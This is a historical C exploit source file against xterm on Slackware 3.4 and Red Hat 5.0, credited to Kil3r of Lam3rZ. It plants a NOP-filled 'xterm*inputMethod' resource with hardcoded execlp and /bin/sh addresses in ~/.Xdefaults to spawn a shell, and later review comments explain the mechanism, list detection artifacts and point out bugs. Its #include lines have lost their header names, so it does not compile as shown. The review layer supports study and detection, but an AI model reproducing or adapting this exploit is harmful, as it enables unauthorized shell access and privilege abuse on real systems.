/*
 * In slackware (3.4): EXECLP should be 0x804bc78, and BIN_SH - 0x8063d2e;
 * In Redhat (5.0)   : EXECLP should be 0x804b1cc, and BIN_SH - 0x80626f2;
 *
 * Based on Solar Designer's: "Getting around non-executable stack(fix)" post
 * and: Rafal Wojtczuk's "Defeating Solar Designer's Non-executable Stack Patch"
 *
 * sploit by Kil3r of Lam3rZ against both Xaw and neXtaw widgets
 * based on xterm_exp.c by alcuin
 *
 * Compile it like this:
 *   gcc 3xterm.c -L /usr/X11/lib/ -lXaw -lXmu -lXt -lSM -lICE -lXext -lX11 -lc
 *
 * GreetZ: bulba, smierc, all of Lam3rZ team and other Polish HackerZ ;)
 */

/*
 * NOTE(review) -- what this listing is, for readers assessing it:
 *
 * This is a historical (year-2000) proof of concept. Functionally the code
 * below does three things that are all visible in the source: it rewrites the
 * user's own X resource file (CONFFILE in $HOME), appends a single resource
 * line "xterm*inputMethod:" whose value is a buffer of 0x90 bytes with a few
 * 4-byte constants embedded at a fixed offset, and then starts xterm so that
 * xterm parses that resource value. The two constants are build-specific
 * addresses taken from the header comment, so the payload only applies to the
 * two listed distributions as the author built them.
 *
 * Detection angle for defenders: the artifact it leaves behind is a
 * ~/.Xdefaults (plus a ~/.Xdefaults.old backup) containing an "xterm*inputMethod:"
 * line followed by a long run of non-printable 0x90 bytes, and an
 * "/bin/cp" / "/bin/mv -f" pair executed via system() right before an exec of
 * /usr/X11R6/bin/xterm. The underlying weakness is a privileged program
 * trusting a user-writable configuration file for more than plain text;
 * details of the target side are not on this page and are not asserted here.
 *
 * NOTE(review): the three #include lines below lost their header names when
 * this listing was extracted, so the file does not compile as shown. From the
 * calls used (fopen/fgets/fputs/perror/fseek, getenv/exit/system,
 * memset/strncmp, isblank, chdir/execl) the original very likely named
 * <stdio.h>, <stdlib.h> and <string.h>, with <ctype.h> and <unistd.h>
 * declarations relied on implicitly -- this cannot be confirmed from the page.
 */
#include
#include
#include

#define CONFFILE ".Xdefaults"      /* X resource file read by xterm, in $HOME */
#define OLDFILE ".Xdefaults.old"   /* backup of the original CONFFILE */
#define NEWFILE ".Xdefaults.new"   /* rewritten copy, moved over CONFFILE below */
#define EXECLP 0x804bc78 // execlp PLT address in xterm (per header: Slackware 3.4 value)
#define BIN_SH 0x8063d2e // "/bin/sh" string address in xterm ;) (per header: Slackware 3.4 value)

/*
 * File-scope write cursor used to store 4-byte values into shellbuf.
 * Nothing else in the file reads it, so it could have been a local in main().
 */
int *ptr;

/*
 * Entry point. Rewrites $HOME/.Xdefaults, then execs xterm.
 *
 * argc/argv are unused. The return type is `void`, which is non-standard
 * (C requires `int main`); if execl() fails the function falls off its end
 * and the process exit status is unspecified.
 *
 * Side effects (all visible below): creates NEWFILE, copies CONFFILE to
 * OLDFILE, replaces CONFFILE with NEWFILE, and replaces the process image
 * with /usr/X11R6/bin/xterm.
 */
void main(int argc, char *argv[])
{
    char *home;
    FILE *f_in, *f_out;
    char buff[16384];      /* one input line of the existing resource file */
    char shellbuf[16384];  /* value written after "xterm*inputMethod:" */
    char *s;
    int i;                 /* unused */

    /* Work in $HOME when it is set; chdir()'s result is not checked, so
     * with an unreadable/unset HOME the files are created in the current
     * directory instead. */
    if (home = getenv("HOME")) chdir(home);
    if (!(f_out = fopen(NEWFILE, "w"))) { perror("fopen"); exit(1); }

    /* Copy the existing resource file, filtering out the inputMethod line.
     * Three things to know about this loop:
     *  - fseek() to 0 right after fopen() is redundant.
     *  - `while (!feof(f))` + unchecked fgets() is the classic C idiom bug:
     *    when fgets() hits EOF it returns NULL and leaves buff holding the
     *    previous line, which is then processed a second time.
     *  - The filter is `strncmp(...) < 0`, not `!= 0`: it keeps only lines
     *    that sort lexicographically *before* "xterm*inputMethod", so any
     *    other resource line sorting at or after it is dropped as well.
     *  - isblank(*s) is called on a plain char; it should be cast to
     *    unsigned char to avoid UB on negative values (CERT STR37-C). */
    if (f_in = fopen(CONFFILE, "r")) {
        fseek(f_in,0,SEEK_SET);
        while (!feof(f_in)) {
            fgets(buff,16384,f_in);
            for (s=buff;isblank(*s);s++);
            if (strncmp(s,"xterm*inputMethod",17)<0) fputs(buff,f_out);
        }
        fclose(f_in);
    }

    /* fill the buffer with nops */
    /* shellbuf becomes 16383 bytes of 0x90 plus a terminating NUL. */
    memset(shellbuf, 0x90, sizeof(shellbuf));
    shellbuf[sizeof(shellbuf)-1] = 0;

    /* Store five 4-byte values at offset 1028: the two #define'd addresses
     * twice each, then 0. Assumes sizeof(int) == 4 (the header's addresses
     * are 32-bit i386 values) and that shellbuf+1028 is suitably aligned;
     * writing an int through a pointer into a char array is also a strict-
     * aliasing concern -- memcpy() would be the well-defined form.
     * Note the final 0 makes fputs() stop after those bytes: fputs writes
     * shellbuf only up to its first NUL byte, not all 16383 bytes. */
    ptr = (int *)(shellbuf+1028);
    *ptr++ =EXECLP;
    *ptr++ =EXECLP;
    *ptr++ =BIN_SH;
    *ptr++ =BIN_SH;
    *ptr++ = 0;

    /* Emit the resource line "xterm*inputMethod:<shellbuf up to first NUL>"
     * and finish the new file. fclose()'s return value is not checked, so a
     * short write would go unnoticed. */
    fputs("xterm*inputMethod:",f_out);
    fputs(shellbuf, f_out);
    fclose(f_out);

    /* Back up the original and move the new file into place. Both commands
     * are fixed string literals (no user-controlled data in the command
     * line), but system() return values are ignored and the shell is spawned
     * from whatever directory chdir() left us in. */
    system("/bin/cp "CONFFILE" "OLDFILE);
    system("/bin/mv -f "NEWFILE" "CONFFILE);

    /* Replace this process with xterm, which will read CONFFILE on start.
     * execl() only returns on failure; that return is not handled. */
    execl("/usr/X11R6/bin/xterm","xterm",NULL);
}
/* www.hack.co.za [2000]*/